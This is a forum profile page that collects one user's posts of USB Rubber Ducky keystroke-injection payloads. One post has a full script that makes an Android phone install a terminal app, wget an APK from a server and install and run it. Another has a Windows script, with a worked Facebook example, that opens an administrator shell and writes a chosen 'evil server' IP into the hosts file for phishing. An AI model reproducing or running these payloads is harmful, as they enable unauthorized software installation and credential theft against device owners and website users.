KoryusaiKun
-
Posts
8 -
Joined
-
Last visited
Posts posted by KoryusaiKun
-
-
Hi Guys n' Girls,
Here's my first payload in a while. What it dose is it opens the Play Store, Search's for terminal emulator, installs it form the store, opens it. Now wgets a file ( I used kos's AntiGuard.apk hosted locally, its the apk i had to hand :) ) then takes you to the install wizard, installs it, then runs it. All in about 20 Seconds. :) It could be quicker, this should work on most devices 4.0 and above i have only tryed it on my Samsung galaxy note II N7100 running android v4.1.1. You may just have to tweek a few things. Like the download URL and the file URI.
Here is a demo as promised:
This script was very annoying solely because of launching the android install wizard. If you use it please say thanks.
REM ----------------------------------------------------
REM Terminal emulator wget install and run V1.0
REM Tested on Samsung Galaxy note II Android V4.1.1
REM Koryusai-Kun
REM ----------------------------------------------------
DELAY 3000
DELAY 100
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
REM open google search
CTRL z
DELAY 1200
REM open play store
STRING play store
DELAY 1000
DOWN
DOWN
DOWN
DOWN
ENTER
DELAY 2000
REM Start Search for 'Terminal Emulator'
STRING t
DELAY 75
STRING e
DELAY 75
STRING r
DELAY 75
STRING m
DELAY 75
STRING i
DELAY 75
STRING n
DELAY 75
STRING a
DELAY 75
STRING l emulator
DELAY 500
ENTER
REM Select 'Terminal Emulator', Install and open
DELAY 1000
DOWN
DOWN
DELAY 50
ENTER
DELAY 300
DOWN
RIGHT
ENTER
DELAY 500
DOWN
DOWN
ENTER
DELAY 300
ENTER
DELAY 2000
DOWN
DOWN
RIGHT
ENTER
DELAY 800
REM Change Dir to /mnt/sdcard/
STRING cd ..
DELAY 50
ENTER
STRING cd ..
DELAY 50
ENTER
STRING cd mnt
DELAY 50
ENTER
STRING cd sdcard
DELAY 50
ENTER
DELAY 50
REM wget the file and open the android package install wizard
STRING wget http://192.168.1.103/AntiGuard.apk; am start -a android.intent.action.MAIN -n com.android.packageinstaller/.PackageInstallerActivity -d file:////mnt//sdcard//AntiGuard.apk
ENTER
REM Go through the install then open the application
DELAY 2500
DOWN
DELAY 200
DOWN
DELAY 200
ENTER
DELAY 1500
DOWN
DELAY 500
DOWN
DELAY 500
DOWN
DELAY 500
ENTER[/CODE] -
No problem mate, hope it works
-
You replace [WEBSITE_ADDRESS] with the website like www.facebook.com and the second with facebook.com then you put the evil server ip where [EVIL_SERVER_IP] is heres an example:
... REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "www.facebook.com" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 www.facebook.com>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "facebook.com" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 facebook.com>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- ...
-
Hi everyone,
This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script:
REM Author: .:Koryusai-Kun:. REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows REM Description: so when the user types into there web browser for example www.facebook.com it REM Description: insted of going to the proper ip it gose to the one in the host file your evil one. REM Description: you need to add the www. version and with out it as well. REM ---[Start CMD as administrator]----------------------- GUI DELAY 50 STRING cmd DELAY 150 MENU DELAY 75 STRING a Enter DELAY 200 LEFT ENTER STRING cls ENTER REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- DELAY 200 STRING exit ENTER
[Payload] Install Android Terminal Emulator wget apk, Install and run
in Classic USB Rubber Ducky
Posted
Just copy and paste it into some think like notepad++